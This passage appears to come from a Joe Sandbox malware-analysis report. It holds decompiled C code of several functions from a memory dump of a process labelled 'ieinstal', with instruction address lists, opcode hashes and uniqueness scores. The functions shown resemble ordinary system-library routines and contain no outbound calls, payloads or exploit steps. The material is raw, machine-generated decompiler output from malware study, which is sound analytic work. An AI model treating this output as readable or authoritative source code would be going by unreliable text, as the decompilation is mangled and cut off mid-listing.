											_push( *_t124);
											E1ED495D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1edf7b9c; // 0x0
									_t92 = L1ED24620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E1ED49910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E1ED0A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E1ED9E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E1ED9E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E1ED495B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                        0x1ed9b8d9
                        0x1ed9b8e4
                        0x00000000
                        0x1ed9b8e6
                        0x1ed9b8f3
                        0x1ed9b8f5
                        0x1ed9b8f5
                        0x1ed9b8f8
                        0x1ed9b920
                        0x1ed9b924
                        0x1ed9b936
                        0x1ed9b939
                        0x1ed9b93d
                        0x1ed9b948
                        0x1ed9b9a0
                        0x1ed9b9a0
                        0x1ed9b9a4
                        0x1ed9b9bf
                        0x1ed9b9c4
                        0x1ed9b9c6
                        0x1ed9b9cd
                        0x1ed9b9d1
                        0x1ed9bad4
                        0x1ed9bad8
                        0x1ed9bada
                        0x1ed9badc
                        0x1ed9badc
                        0x1ed9badf
                        0x1ed9bae0
                        0x1ed9bae2
                        0x1ed9bae4
                        0x1ed9baec
                        0x1ed9baee
                        0x1ed9baf0
                        0x1ed9baf0
                        0x1ed9baec
                        0x1ed9bafb
                        0x1ed9bafc
                        0x1ed9bafe
                        0x1ed9bb01
                        0x1ed9bb01
                        0x00000000
                        0x1ed9bb06
                        0x1ed9b9d7
                        0x1ed9b9db
                        0x1ed9b9db
                        0x1ed9b9de
                        0x1ed9b9de
                        0x1ed9b9e4
                        0x1ed9b9e7
                        0x1ed9b9ea
                        0x1ed9b9ec
                        0x1ed9b9ef
                        0x1ed9b9f3
                        0x1ed9ba1b
                        0x1ed9ba1b
                        0x1ed9ba23
                        0x1ed9ba24
                        0x1ed9ba27
                        0x1ed9ba2a
                        0x1ed9ba2b
                        0x1ed9ba2e
                        0x1ed9ba30
                        0x1ed9ba37
                        0x1ed9ba3f
                        0x1ed9ba9c
                        0x1ed9baa2
                        0x1ed9bb13
                        0x1ed9bb15
                        0x1ed9baae
                        0x1ed9baae
                        0x1ed9bab3
                        0x1ed9bab5
                        0x1ed9baba
                        0x1ed9bac8
                        0x1ed9bac8
                        0x1ed9baba
                        0x1ed9bacd
                        0x1ed9bacf
                        0x00000000
                        0x1ed9bacf
                        0x1ed9bb1a
                        0x00000000
                        0x1ed9bb1c
                        0x1ed9baa7
                        0x1ed9bb11
                        0x00000000
                        0x1ed9bb11
                        0x1ed9baa9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed9ba41
                        0x1ed9ba41
                        0x1ed9ba41
                        0x1ed9ba58
                        0x1ed9ba5d
                        0x1ed9ba62
                        0x00000000
                        0x00000000
                        0x1ed9ba64
                        0x1ed9ba67
                        0x1ed9ba68
                        0x1ed9ba69
                        0x1ed9ba6c
                        0x1ed9ba6f
                        0x1ed9ba71
                        0x1ed9ba78
                        0x1ed9ba80
                        0x00000000
                        0x00000000
                        0x1ed9ba90
                        0x1ed9ba90
                        0x1ed9ba97
                        0x00000000
                        0x1ed9ba97
                        0x1ed9b9f5
                        0x1ed9b9f7
                        0x1ed9b9f7
                        0x1ed9b9fa
                        0x1ed9ba03
                        0x1ed9ba07
                        0x1ed9ba0c
                        0x1ed9ba10
                        0x1ed9ba17
                        0x00000000
                        0x1ed9b9f7
                        0x1ed9b9a6
                        0x1ed9b9a8
                        0x1ed9b9af
                        0x1ed9b9b3
                        0x00000000
                        0x00000000
                        0x1ed9b9b9
                        0x00000000
                        0x1ed9b9b9
                        0x1ed9b94d
                        0x1ed9b98f
                        0x1ed9b995
                        0x1ed9b999
                        0x1ed9b960
                        0x1ed9b967
                        0x1ed9b968
                        0x1ed9b96a
                        0x00000000
                        0x1ed9b96a
                        0x1ed9b99b
                        0x1ed9b99e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed9b99e
                        0x1ed9b951
                        0x1ed9b954
                        0x1ed9b95a
                        0x1ed9b95e
                        0x1ed9b972
                        0x1ed9b979
                        0x1ed9b97d
                        0x1ed9b97f
                        0x1ed9b980
                        0x1ed9b982
                        0x1ed9b984
                        0x00000000
                        0x1ed9b984
                        0x00000000
                        0x1ed9b926
                        0x00000000
                        0x1ed9b926

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6bfbbd34c6307348cd87daccfde2396c3dc427bbeca17966ab5e45864f6f766
                        • Instruction ID: 8ebd65b686ad475b38d5cd3a4ea97127ad259a93a63c3331b1bff69e300b5002
                        • Opcode Fuzzy Hash: e6bfbbd34c6307348cd87daccfde2396c3dc427bbeca17966ab5e45864f6f766
                        • Instruction Fuzzy Hash: C1712E36200742AFD721CF15CC44F56BBB6EF44724F624B28E5968B6E0DBB4E940EB64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED052A5, Relevance: .2, Instructions: 161COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E1ED052A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E1ED1EEF0(0x1edf79a0);
					_t104 =  *0x1edf8210; // 0x2fb2dd8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E1ED1EB70(_t93, 0x1edf79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E1ED49890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E1ED1EEF0(0x1edf79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E1ED1EB70(0, 0x1edf79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x2fb2de5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E1ED3F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E1ED1EEF0(0x1edf79a0);
									__eflags =  *0x1edf8210 - _t104; // 0x2fb2dd8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1edf8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E1ED84888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E1ED1EB70(_t95, 0x1edf79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E1ED495D0();
											L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E1ED495D0();
											L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E1ED1EB70(_t93, 0x1edf79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E1ED495D0();
										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E1ED495D0();
										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E1ED3F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                        0x1ed052a5
                        0x1ed052ad
                        0x1ed052b0
                        0x1ed052b3
                        0x1ed052b7
                        0x1ed052ba
                        0x1ed052bf
                        0x1ed052c4
                        0x1ed052cc
                        0x00000000
                        0x00000000
                        0x1ed052ce
                        0x1ed052d9
                        0x1ed052dd
                        0x1ed052e7
                        0x1ed052f7
                        0x1ed052f9
                        0x1ed052fd
                        0x1ed60dcf
                        0x1ed60dd5
                        0x1ed60dd6
                        0x1ed60dd7
                        0x1ed60dd8
                        0x1ed60dd9
                        0x1ed60dde
                        0x1ed60ddf
                        0x1ed60de0
                        0x1ed60de1
                        0x1ed60de2
                        0x1ed60de5
                        0x1ed60dea
                        0x1ed60dec
                        0x1ed60f60
                        0x1ed60f64
                        0x1ed60f70
                        0x1ed60f76
                        0x1ed60f79
                        0x1ed60f79
                        0x00000000
                        0x1ed60f64
                        0x1ed60df2
                        0x1ed60df7
                        0x1ed60e04
                        0x1ed60e0d
                        0x1ed60e0d
                        0x1ed60e10
                        0x1ed60e1a
                        0x1ed60e1c
                        0x1ed60e4c
                        0x1ed60e52
                        0x1ed60e61
                        0x1ed60e67
                        0x1ed60e6b
                        0x1ed60e70
                        0x1ed60e76
                        0x1ed60ed7
                        0x1ed60edc
                        0x1ed60ee0
                        0x1ed60ee6
                        0x1ed60eea
                        0x1ed60eed
                        0x1ed60ef0
                        0x1ed60ef3
                        0x1ed60ef6
                        0x1ed60ef9
                        0x1ed60efe
                        0x1ed60f01
                        0x1ed60f01
                        0x1ed60f0b
                        0x1ed60f12
                        0x1ed60f16
                        0x1ed60f18
                        0x1ed60f1b
                        0x1ed60f2c
                        0x1ed60f31
                        0x1ed60f31
                        0x1ed60f35
                        0x1ed60f39
                        0x1ed60f3a
                        0x1ed60f3c
                        0x1ed60f3f
                        0x1ed60f50
                        0x1ed60f55
                        0x1ed60f55
                        0x1ed60f59
                        0x1ed052eb
                        0x1ed052f1
                        0x1ed052f1
                        0x1ed60e7d
                        0x1ed60e84
                        0x1ed60e88
                        0x1ed60e8a
                        0x1ed60e8d
                        0x1ed60e9e
                        0x1ed60ea3
                        0x1ed60ea3
                        0x1ed60ea7
                        0x1ed60eaf
                        0x1ed60eb3
                        0x1ed60eb9
                        0x1ed60eb9
                        0x1ed60ebc
                        0x1ed60ecd
                        0x1ed60ecd
                        0x00000000
                        0x1ed60eb3
                        0x1ed60e21
                        0x1ed60e2b
                        0x1ed60e2f
                        0x1ed60e30
                        0x1ed60e3a
                        0x1ed60e3f
                        0x1ed60e41
                        0x00000000
                        0x00000000
                        0x1ed60e47
                        0x00000000
                        0x1ed60e47
                        0x1ed60df9
                        0x1ed60dfe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed60dfe
                        0x1ed05303
                        0x1ed05307
                        0x00000000
                        0x1ed05309
                        0x00000000
                        0x1ed05309
                        0x1ed05307
                        0x1ed052e9
                        0x1ed052e9
                        0x00000000
                        0x1ed052e9
                        0x1ed0530e
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 46c2e01692516957e9f03a4230a28a355f2de0584832d0c92916e40e5cf3db98
                        • Instruction ID: 1b4ad33d5af60851e0780a01739e861b74655a912f5f6183095c69a29ec6b8df
                        • Opcode Fuzzy Hash: 46c2e01692516957e9f03a4230a28a355f2de0584832d0c92916e40e5cf3db98
                        • Instruction Fuzzy Hash: 6251D974104382ABD320CF68C940B5BBBA5FF54710F250F2AE8958BA90E770F844CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED32AE4, Relevance: .2, Instructions: 159COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED32AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1edf8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1edf8208; // 0x1edf8207
				_t8 = _t57 + 0x1edf8208; // 0x1edf8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1edf8450; // 0x3003630
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x1edf821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1edf6d5c; // 0x7fe20654
							_t72 =  *0x1edf6d5c; // 0x7fe20654
							_t75 =  *0x1edf6d5c; // 0x7fe20654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1edf6d5c; // 0x7fe20654
							_t84 =  *0x1edf6d5c; // 0x7fe20654
							_t87 =  *0x1edf6d5c; // 0x7fe20654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E1ED4F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                        0x1ed32ae4
                        0x1ed32aec
                        0x1ed32aef
                        0x1ed32af4
                        0x1ed32af7
                        0x1ed32afd
                        0x1ed32b92
                        0x1ed32b92
                        0x1ed32b97
                        0x1ed32b9c
                        0x1ed32b9c
                        0x1ed32b03
                        0x1ed32b06
                        0x1ed32b09
                        0x1ed32b09
                        0x1ed32b0f
                        0x1ed32b15
                        0x1ed32b15
                        0x1ed32b1b
                        0x1ed32b1e
                        0x1ed32b21
                        0x1ed32b26
                        0x1ed32b29
                        0x1ed32b81
                        0x1ed32b84
                        0x1ed32c0e
                        0x1ed32c15
                        0x1ed32c24
                        0x1ed32c24
                        0x1ed32b8a
                        0x1ed32b8a
                        0x1ed32b8a
                        0x1ed32b8a
                        0x1ed32b90
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed32b4a
                        0x1ed32b4a
                        0x1ed32b4d
                        0x1ed32b53
                        0x00000000
                        0x00000000
                        0x1ed32b55
                        0x1ed32b58
                        0x1ed32bb7
                        0x1ed75d1b
                        0x1ed75d37
                        0x1ed75d47
                        0x1ed75d53
                        0x1ed32bbd
                        0x1ed32bbd
                        0x1ed32bbd
                        0x1ed32bb7
                        0x1ed32b5d
                        0x1ed32c2f
                        0x1ed75d5b
                        0x1ed75d77
                        0x1ed75d87
                        0x1ed75d93
                        0x1ed32c35
                        0x1ed32c35
                        0x1ed32c35
                        0x1ed32c2f
                        0x1ed32b65
                        0x1ed32b9f
                        0x1ed32ba2
                        0x1ed32b67
                        0x1ed32b67
                        0x1ed32b69
                        0x1ed32b6b
                        0x1ed32b6e
                        0x1ed32bc9
                        0x1ed32bcc
                        0x1ed32bcf
                        0x1ed32bd4
                        0x1ed32bd6
                        0x1ed32bd6
                        0x1ed32bdb
                        0x1ed32c02
                        0x1ed32c05
                        0x1ed32c07
                        0x00000000
                        0x1ed32c07
                        0x1ed32be0
                        0x1ed32c00
                        0x1ed32c3f
                        0x1ed32c3f
                        0x00000000
                        0x1ed32c00
                        0x1ed32be5
                        0x1ed32be7
                        0x1ed32bec
                        0x1ed32bf4
                        0x1ed32bf6
                        0x00000000
                        0x1ed32bf6
                        0x1ed32b70
                        0x1ed32b76
                        0x1ed32b2b
                        0x1ed32b2b
                        0x1ed32b2d
                        0x1ed32b2f
                        0x1ed32b32
                        0x1ed32b35
                        0x1ed32b3a
                        0x00000000
                        0x1ed32b40
                        0x1ed32b43
                        0x1ed32b45
                        0x1ed32b47
                        0x1ed32b4a
                        0x1ed32b4d
                        0x1ed32b53
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed32b53
                        0x1ed32b78
                        0x1ed32b78
                        0x1ed32b7b
                        0x1ed32b7e
                        0x00000000
                        0x1ed32b7e
                        0x1ed32b76
                        0x1ed32ba5
                        0x1ed32ba5
                        0x1ed32ba8
                        0x1ed32bad
                        0x00000000
                        0x00000000
                        0x1ed32baf
                        0x1ed32baf
                        0x1ed32bc2
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7a4872846d1d2060b33bba760f206dec1060272f267b978eb4ad6b1633812267
                        • Instruction ID: 237bd41c924f10b32f34bf5604a7a215ff248d5348ba0e91dacea2498a635552
                        • Opcode Fuzzy Hash: 7a4872846d1d2060b33bba760f206dec1060272f267b978eb4ad6b1633812267
                        • Instruction Fuzzy Hash: E051B3B6E00125CFCB14CF1DC8909ADB7B5FF88B01725865AE896AB318D770AE51CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDCAE44, Relevance: .2, Instructions: 152COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E1EDCAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E1EDCC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E1EDCACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E1EDCFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E1EDCEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E1ED27D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E1EDC1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E1EDD1536(0x1edf8ae4, (_t74 -  *0x1edf8b04 >> 0x14) + (_t74 -  *0x1edf8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L1EDCC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E1EDCA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E1EDACB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E1EDCACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                        0x1edcae44
                        0x1edcae4c
                        0x1edcae53
                        0x1edcae55
                        0x1edcae5c
                        0x1edcae64
                        0x1edcae68
                        0x1edcae75
                        0x1edcae75
                        0x1edcae78
                        0x1edcae7a
                        0x1edcae7c
                        0x1edcae7f
                        0x1edcaea8
                        0x1edcaeab
                        0x1edcaead
                        0x00000000
                        0x00000000
                        0x1edcaeb3
                        0x1edcaeb8
                        0x1edcaebb
                        0x1edcaebd
                        0x00000000
                        0x1edcae81
                        0x1edcae88
                        0x1edcae8f
                        0x1edcae9b
                        0x1edcae96
                        0x1edcae96
                        0x1edcae96
                        0x1edcaea0
                        0x1edcaea3
                        0x1edcaebf
                        0x1edcaebf
                        0x1edcaec3
                        0x1edcaec9
                        0x1edcaf0d
                        0x1edcaf14
                        0x1edcaf3d
